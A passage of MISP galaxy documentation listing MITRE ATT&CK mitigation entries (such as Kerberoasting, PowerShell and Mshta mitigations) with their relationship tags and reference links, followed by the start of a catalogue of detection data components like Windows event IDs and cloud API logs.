  • mitigates: misp-galaxy:mitre-attack-pattern="Remotely Track Device Without Authorization - T1468" with estimative-language:likelihood-probability="almost-certain"

Table 6682. Table References

Links

https://attack.mitre.org/mitigations/M1011

Enterprise Policy - M1012

An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.

The tag is: misp-galaxy:mitre-course-of-action="Enterprise Policy - M1012"

Enterprise Policy - M1012 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Abuse Accessibility Features - T1453" with estimative-language:likelihood-probability="almost-certain"

Table 6683. Table References

Links

https://attack.mitre.org/mitigations/M1012

Interconnection Filtering - M1014

In order to mitigate Signaling System 7 (SS7) exploitation, the Communications, Security, Reliability, and Interoperability Council (CSRIC) describes filtering interconnections between network operators to block inappropriate requests (Citation: CSRIC5-WG10-FinalReport).

The tag is: misp-galaxy:mitre-course-of-action="Interconnection Filtering - M1014"

Interconnection Filtering - M1014 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450" with estimative-language:likelihood-probability="almost-certain"

Table 6684. Table References

Links

https://attack.mitre.org/mitigations/M1014

https://web.archive.org/web/20200330012714/https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

Rootkit Mitigation - T1014

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Rootkit Mitigation - T1014"

Rootkit Mitigation - T1014 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 6685. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1014

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Update Software - M1051

Perform regular software updates to mitigate exploitation risk.

The tag is: misp-galaxy:mitre-course-of-action="Update Software - M1051"

Table 6686. Table References

Links

https://attack.mitre.org/mitigations/M1051

Vulnerability Scanning - M1016

Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.

The tag is: misp-galaxy:mitre-course-of-action="Vulnerability Scanning - M1016"

Table 6687. Table References

Links

https://attack.mitre.org/mitigations/M1016

Mshta Mitigation - T1170

Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="Mshta Mitigation - T1170"

Mshta Mitigation - T1170 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Mshta - T1170" with estimative-language:likelihood-probability="almost-certain"

Table 6688. Table References

Links

https://attack.mitre.org/mitigations/T1170

User Training - M1017

Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

The tag is: misp-galaxy:mitre-course-of-action="User Training - M1017"

Table 6689. Table References

Links

https://attack.mitre.org/mitigations/M1017

Screensaver Mitigation - T1180

Block .scr files from being executed from non-standard locations. Set Group Policy to force users to have a dedicated screensaver where local changes should not override the settings to prevent changes. Use Group Policy to disable screensavers if they are unnecessary. (Citation: TechNet Screensaver GP)

The tag is: misp-galaxy:mitre-course-of-action="Screensaver Mitigation - T1180"

Screensaver Mitigation - T1180 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Screensaver - T1180" with estimative-language:likelihood-probability="almost-certain"

Table 6690. Table References

Links

https://attack.mitre.org/mitigations/T1180

https://technet.microsoft.com/library/cc938799.aspx

Rundll32 Mitigation - T1085

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Rundll32 Mitigation - T1085"

Rundll32 Mitigation - T1085 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rundll32 - T1085" with estimative-language:likelihood-probability="almost-certain"

Table 6691. Table References

Links

https://attack.mitre.org/mitigations/T1085

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

Hypervisor Mitigation - T1062

Prevent adversary access to privileged accounts necessary to install a hypervisor.

The tag is: misp-galaxy:mitre-course-of-action="Hypervisor Mitigation - T1062"

Hypervisor Mitigation - T1062 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hypervisor - T1062" with estimative-language:likelihood-probability="almost-certain"

Table 6692. Table References

Links

https://attack.mitre.org/mitigations/T1062

DCShadow Mitigation - T1207

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="DCShadow Mitigation - T1207"

DCShadow Mitigation - T1207 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 6693. Table References

Links

https://attack.mitre.org/mitigations/T1207

Password Policies - M1027

Set and enforce secure password policies for accounts.

The tag is: misp-galaxy:mitre-course-of-action="Password Policies - M1027"

Table 6694. Table References

Links

https://attack.mitre.org/mitigations/M1027

Kerberoasting Mitigation - T1208

Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. (Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators. (Citation: AdSecurity Cracking Kerberos Dec 2015)

Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible. (Citation: AdSecurity Cracking Kerberos Dec 2015)

The tag is: misp-galaxy:mitre-course-of-action="Kerberoasting Mitigation - T1208"

Kerberoasting Mitigation - T1208 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"

Table 6695. Table References

Links

https://adsecurity.org/?p=2293

https://attack.mitre.org/mitigations/T1208

Data Backup - M1053

Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.

The tag is: misp-galaxy:mitre-course-of-action="Data Backup - M1053"

Table 6696. Table References

Links

https://attack.mitre.org/mitigations/M1053

Masquerading Mitigation - T1036

When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.

Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Masquerading Mitigation - T1036"

Masquerading Mitigation - T1036 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 6697. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1036

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Execution Prevention - M1038

Block execution of code on a system through application control, and/or script blocking.

The tag is: misp-galaxy:mitre-course-of-action="Execution Prevention - M1038"

Table 6698. Table References

Links

https://attack.mitre.org/mitigations/M1038

Software Configuration - M1054

Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.

The tag is: misp-galaxy:mitre-course-of-action="Software Configuration - M1054"

Table 6699. Table References

Links

https://attack.mitre.org/mitigations/M1054

Code Signing - M1045

Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.

The tag is: misp-galaxy:mitre-course-of-action="Code Signing - M1045"

Table 6700. Table References

Links

https://attack.mitre.org/mitigations/M1045

Boot Integrity - M1046

Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.

The tag is: misp-galaxy:mitre-course-of-action="Boot Integrity - M1046"

Table 6701. Table References

Links

https://attack.mitre.org/mitigations/M1046

Scripting Mitigation - T1064

Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.

Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy. (Citation: Microsoft Block Office Macros) Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

The tag is: misp-galaxy:mitre-course-of-action="Scripting Mitigation - T1064"

Scripting Mitigation - T1064 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 6702. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1064

https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/

Bootkit Mitigation - T1067

Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform this action. Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)

The tag is: misp-galaxy:mitre-course-of-action="Bootkit Mitigation - T1067"

Bootkit Mitigation - T1067 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Bootkit - T1067" with estimative-language:likelihood-probability="almost-certain"

Table 6703. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

https://attack.mitre.org/mitigations/T1067

https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process

PowerShell Mitigation - T1086

It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions. When PowerShell is necessary, restrict PowerShell execution policy to administrators and to only execute signed scripts. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration. (Citation: Netspi PowerShell Execution Policy Bypass) Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.

The tag is: misp-galaxy:mitre-course-of-action="PowerShell Mitigation - T1086"

PowerShell Mitigation - T1086 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="PowerShell - T1086" with estimative-language:likelihood-probability="almost-certain"

Table 6704. Table References

Links

https://attack.mitre.org/mitigations/T1086

https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

Timestomp Mitigation - T1099

Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Timestomp Mitigation - T1099"

Timestomp Mitigation - T1099 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Timestomp - T1099" with estimative-language:likelihood-probability="almost-certain"

Table 6705. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1099

https://technet.microsoft.com/en-us/library/ee791851.aspx

Regsvr32 Mitigation - T1117

Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET)

The tag is: misp-galaxy:mitre-course-of-action="Regsvr32 Mitigation - T1117"

Regsvr32 Mitigation - T1117 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1117" with estimative-language:likelihood-probability="almost-certain"

Table 6706. Table References

Links

https://attack.mitre.org/mitigations/T1117

https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET

InstallUtil Mitigation - T1118

InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.

The tag is: misp-galaxy:mitre-course-of-action="InstallUtil Mitigation - T1118"

InstallUtil Mitigation - T1118 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="InstallUtil - T1118" with estimative-language:likelihood-probability="almost-certain"

Table 6707. Table References

Links

https://attack.mitre.org/mitigations/T1118

CMSTP Mitigation - T1191

CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries. (Citation: MSitPros CMSTP Aug 2017)

The tag is: misp-galaxy:mitre-course-of-action="CMSTP Mitigation - T1191"

CMSTP Mitigation - T1191 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="CMSTP - T1191" with estimative-language:likelihood-probability="almost-certain"

Table 6708. Table References

Links

https://attack.mitre.org/mitigations/T1191

https://msitpros.com/?p=3960

Keychain Mitigation - T1142

The password for the user’s login keychain can be changed from the user’s login password. This increases the complexity for an adversary because they need to know an additional password.

The tag is: misp-galaxy:mitre-course-of-action="Keychain Mitigation - T1142"

Keychain Mitigation - T1142 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Keychain - T1142" with estimative-language:likelihood-probability="almost-certain"

Table 6709. Table References

Links

https://attack.mitre.org/mitigations/T1142

Launchctl Mitigation - T1152

Prevent users from installing their own launch agents or launch daemons and instead require them to be pushed out by group policy.

The tag is: misp-galaxy:mitre-course-of-action="Launchctl Mitigation - T1152"

Launchctl Mitigation - T1152 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1152" with estimative-language:likelihood-probability="almost-certain"

Table 6710. Table References

Links

https://attack.mitre.org/mitigations/T1152

Source Mitigation - T1153

Due to potential legitimate uses of source commands, it’s may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Source Mitigation - T1153"

Source Mitigation - T1153 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Source - T1153" with estimative-language:likelihood-probability="almost-certain"

Table 6711. Table References

Links

https://attack.mitre.org/mitigations/T1153

Trap Mitigation - T1154

Due to potential legitimate uses of trap commands, it’s may be difficult to mitigate use of this technique.

The tag is: misp-galaxy:mitre-course-of-action="Trap Mitigation - T1154"

Trap Mitigation - T1154 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Trap - T1154" with estimative-language:likelihood-probability="almost-certain"

Table 6712. Table References

Links

https://attack.mitre.org/mitigations/T1154

HISTCONTROL Mitigation - T1148

Prevent users from changing the <code>HISTCONTROL</code> environment variable (Citation: Securing bash history). Also, make sure that the <code>HISTCONTROL</code> environment variable is set to “ignoredup” instead of “ignoreboth” or “ignorespace”.

The tag is: misp-galaxy:mitre-course-of-action="HISTCONTROL Mitigation - T1148"

HISTCONTROL Mitigation - T1148 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="HISTCONTROL - T1148" with estimative-language:likelihood-probability="almost-certain"

Table 6713. Table References

Links

http://www.akyl.net/securing-bashhistory-file-make-sure-your-linux-system-users-won%E2%80%99t-hide-or-delete-their-bashhistory

https://attack.mitre.org/mitigations/T1148

Defacement Mitigation - T1491

Implementing best practices for websites such as defending against [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) (Citation: OWASP Top 10 2017). Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data. (Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.

The tag is: misp-galaxy:mitre-course-of-action="Defacement Mitigation - T1491"

Table 6714. Table References

Links

https://attack.mitre.org/mitigations/T1491

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

AppleScript Mitigation - T1155

Require that all AppleScript be signed by a trusted developer ID before being executed - this will prevent random AppleScript code from executing (Citation: applescript signing). This subjects AppleScript code to the same scrutiny as other .app files passing through Gatekeeper.

The tag is: misp-galaxy:mitre-course-of-action="AppleScript Mitigation - T1155"

AppleScript Mitigation - T1155 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppleScript - T1155" with estimative-language:likelihood-probability="almost-certain"

Table 6715. Table References

Links

https://attack.mitre.org/mitigations/T1155

https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/

Sudo Mitigation - T1169

The sudoers file should be strictly edited such that passwords are always required and that users can’t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Mitigation - T1169"

Sudo Mitigation - T1169 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Sudo - T1169" with estimative-language:likelihood-probability="almost-certain"

Table 6716. Table References

Links

https://attack.mitre.org/mitigations/T1169

Hooking Mitigation - T1179

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

The tag is: misp-galaxy:mitre-course-of-action="Hooking Mitigation - T1179"

Hooking Mitigation - T1179 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hooking - T1179" with estimative-language:likelihood-probability="almost-certain"

Table 6717. Table References

Links

https://attack.mitre.org/mitigations/T1179

Pre-compromise - M1056

This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.

The tag is: misp-galaxy:mitre-course-of-action="Pre-compromise - M1056"

Table 6718. Table References

Links

https://attack.mitre.org/mitigations/M1056

Antivirus/Antimalware - M1049

Use signatures or heuristics to detect malicious software.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1049"

Table 6719. Table References

Links

https://attack.mitre.org/mitigations/M1049

Antivirus/Antimalware - M1058

Mobile security products, such as Mobile Threat Defense (MTD), offer various device-based mitigations against certain behaviors.

The tag is: misp-galaxy:mitre-course-of-action="Antivirus/Antimalware - M1058"

Table 6720. Table References

Links

https://attack.mitre.org/mitigations/M1058

Attestation - M1002

Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.

The tag is: misp-galaxy:mitre-course-of-action="Attestation - M1002"

Attestation - M1002 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1398" with estimative-language:likelihood-probability="almost-certain"

Table 6721. Table References

Links

https://attack.mitre.org/mitigations/M1002

Audit - M1047

Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

The tag is: misp-galaxy:mitre-course-of-action="Audit - M1047"

Table 6722. Table References

Links

https://attack.mitre.org/mitigations/M1047

mitre-data-component

Data components are parts of data sources. .

mitre-data-component is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Active Directory Object Access

Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Access"

Table 6723. Table References

Links

Active Directory Object Creation

Initial construction of a new active directory object (ex: Windows EID 5137)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Creation"

Table 6724. Table References

Links

Active Directory Credential Request

A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)

The tag is: misp-galaxy:mitre-data-component="Active Directory Credential Request"

Table 6725. Table References

Links

Active Directory Object Deletion

Removal of an active directory object (ex: Windows EID 5141)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Deletion"

Table 6726. Table References

Links

Active Directory Object Modification

Changes made to an active directory object (ex: Windows EID 5163 or 5136)

The tag is: misp-galaxy:mitre-data-component="Active Directory Object Modification"

Table 6727. Table References

Links

Windows Registry Key Access

Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Access"

Table 6728. Table References

Links

Windows Registry Key Creation

Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Creation"

Table 6729. Table References

Links

Windows Registry Key Deletion

Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Deletion"

Table 6730. Table References

Links

Windows Registry Key Modification

Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)

The tag is: misp-galaxy:mitre-data-component="Windows Registry Key Modification"

Table 6731. Table References

Links

User Account Authentication

An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)

The tag is: misp-galaxy:mitre-data-component="User Account Authentication"

Table 6732. Table References

Links

Application Log Content

Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)

The tag is: misp-galaxy:mitre-data-component="Application Log Content"

Table 6733. Table References

Links

Cloud Storage Access

Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Access"

Table 6734. Table References

Links

User Account Creation

Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)

The tag is: misp-galaxy:mitre-data-component="User Account Creation"

Table 6735. Table References

Links

User Account Deletion

Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)

The tag is: misp-galaxy:mitre-data-component="User Account Deletion"

Table 6736. Table References

Links

OS API Execution

Operating system function/method calls executed by a process

The tag is: misp-galaxy:mitre-data-component="OS API Execution"

Table 6737. Table References

Links

User Account Metadata

Contextual data about an account, which may include a username, user ID, environmental data, etc.

The tag is: misp-galaxy:mitre-data-component="User Account Metadata"

Table 6738. Table References

Links

User Account Modification

Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)

The tag is: misp-galaxy:mitre-data-component="User Account Modification"

Table 6739. Table References

Links

Network Share Access

Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)

The tag is: misp-galaxy:mitre-data-component="Network Share Access"

Table 6740. Table References

Links

Network Connection Creation

Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)

The tag is: misp-galaxy:mitre-data-component="Network Connection Creation"

Table 6741. Table References

Links

Cloud Storage Creation

Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Creation"

Table 6742. Table References

Links

Web Credential Creation

Initial construction of new web credential material (ex: Windows EID 1200 or 4769)

The tag is: misp-galaxy:mitre-data-component="Web Credential Creation"

Table 6743. Table References

Links

Cloud Service Disable

Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Disable"

Table 6744. Table References

Links

Cloud Storage Deletion

Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Deletion"

Table 6745. Table References

Links

Cloud Storage Enumeration

An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Enumeration"

Table 6746. Table References

Links

Cloud Service Enumeration

An extracted list of cloud services (ex: AWS ECS ListServices)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Enumeration"

Table 6747. Table References

Links

Scheduled Job Creation

Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Creation"

Table 6748. Table References

Links

Logon Session Creation

Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)

The tag is: misp-galaxy:mitre-data-component="Logon Session Creation"

Table 6749. Table References

Links

Cloud Storage Metadata

Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Metadata"

Table 6750. Table References

Links

Cloud Service Metadata

Contextual data about a cloud service and activity around it such as name, type, or purpose/function

The tag is: misp-galaxy:mitre-data-component="Cloud Service Metadata"

Table 6751. Table References

Links

Cloud Storage Modification

Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)

The tag is: misp-galaxy:mitre-data-component="Cloud Storage Modification"

Table 6752. Table References

Links

Cloud Service Modification

Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule)

The tag is: misp-galaxy:mitre-data-component="Cloud Service Modification"

Table 6753. Table References

Links

Network Traffic Content

Logged network traffic data showing both protocol header and body values (ex: PCAP)

The tag is: misp-galaxy:mitre-data-component="Network Traffic Content"

Table 6754. Table References

Links

Web Credential Usage

An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)

The tag is: misp-galaxy:mitre-data-component="Web Credential Usage"

Table 6755. Table References

Links

Firewall Rule Modification

Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)

The tag is: misp-galaxy:mitre-data-component="Firewall Rule Modification"

Table 6756. Table References

Links

Network Traffic Flow

Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)

The tag is: misp-galaxy:mitre-data-component="Network Traffic Flow"

Table 6757. Table References

Links

Scheduled Job Metadata

Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Metadata"

Table 6758. Table References

Links

Scheduled Job Modification

Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)

The tag is: misp-galaxy:mitre-data-component="Scheduled Job Modification"

Table 6759. Table References

Links

Kernel Module Load

An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls

The tag is: misp-galaxy:mitre-data-component="Kernel Module Load"

Table 6760. Table References

Links

Logon Session Metadata

Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it

The tag is: misp-galaxy:mitre-data-component="Logon Session Metadata"

Table 6761. Table References

Links

Named Pipe Metadata

Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)

The tag is: misp-galaxy:mitre-data-component="Named Pipe Metadata"

Table 6762. Table References

Links

API Calls

API calls utilized by an application that could indicate malicious activity

The tag is: misp-galaxy:mitre-data-component="API Calls"

Table 6763. Table References

Links

Active DNS

Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)

The tag is: misp-galaxy:mitre-data-component="Active DNS"

Table 6764. Table References

Links

Drive Access

Opening of a data storage device with an assigned drive letter or mount point

The tag is: misp-galaxy:mitre-data-component="Drive Access"

Table 6765. Table References

Links

File Access

Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)

The tag is: misp-galaxy:mitre-data-component="File Access"

Table 6766. Table References

Links

Process Access

Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)

The tag is: misp-galaxy:mitre-data-component="Process Access"

Table 6767. Table References

Links

Container Creation

Initial construction of a new container (ex: docker create <container_name>)

The tag is: misp-galaxy:mitre-data-component="Container Creation"

Table 6768. Table References

Links

Drive Creation

Initial construction of a drive letter or mount point to a data storage device

The tag is: misp-galaxy:mitre-data-component="Drive Creation"

Table 6769. Table References

Links

Container Enumeration

An extracted list of containers (ex: docker ps)

The tag is: misp-galaxy:mitre-data-component="Container Enumeration"

Table 6770. Table References

Links

Command Execution

The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like >dir, shell executions, etc. )

The tag is: misp-galaxy:mitre-data-component="Command Execution"

Table 6771. Table References

Links

File Creation

Initial construction of a new file (ex: Sysmon EID 11)

The tag is: misp-galaxy:mitre-data-component="File Creation"

Table 6772. Table References

Links

WMI Creation

